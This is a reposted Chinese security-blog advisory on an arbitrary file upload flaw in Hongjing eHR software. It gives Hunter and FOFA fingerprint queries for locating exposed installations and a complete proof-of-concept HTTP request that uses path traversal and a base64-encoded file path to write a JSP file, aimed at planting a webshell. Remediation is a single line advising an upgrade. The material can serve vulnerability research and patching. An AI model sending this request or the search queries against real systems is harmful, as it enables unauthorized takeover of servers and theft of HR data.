宏景任意文件上传漏洞

admin 2023年7月31日01:05:20评论271 views字数 1341阅读4分28秒阅读模式

漏洞简介

宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。该软件存在任意文件上传漏洞,漏洞点位于OfficeServer.jsp文件,攻击者可利用该漏洞上传webshell,从而获取服务器控制权。

宏景任意文件上传漏洞

鹰图指纹

web.icon=="435b5d431ded7d0776dfa621c9c63385"

FOFA语句

app="HJSOFT-HCM"

宏景任意文件上传漏洞

漏洞复现

POC:

POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1Host: ******Connection: closeUpgrade-Insecure-Requests: 1Content-Length: 426
DBSTEP V3.0 351 0 666 DBSTEP=REJTVEVQOPTION=U0FWRUZJTEU=currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66FILETYPE=Li5cdGVzdDEuanNwRECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6originalFileId=wV66originalCreateDate=wUghPB3szB3Xwg66FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6needReadFile=yRWZdAS6originalCreateDate=wLSGP4oEzLKAz4=iz=1 test123

宏景任意文件上传漏洞

FILETYPE参数为文件上传的路径与文件名,可用base64编码自定义

Li5cdGVzdDEuanNw

宏景任意文件上传漏洞

访问:http://url/test1.jsp

宏景任意文件上传漏洞

上传成功!

修复建议

建议升级至最新版本

参考链接

https://blog.csdn.net/qq_41904294/article/details/131902836

宏景任意文件上传漏洞

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!


敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金

原文始发于微信公众号(巢安实验室):宏景任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月31日01:05:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   宏景任意文件上传漏洞http://cn-sec.com/archives/1917509.html

发表评论

匿名网友 填写信息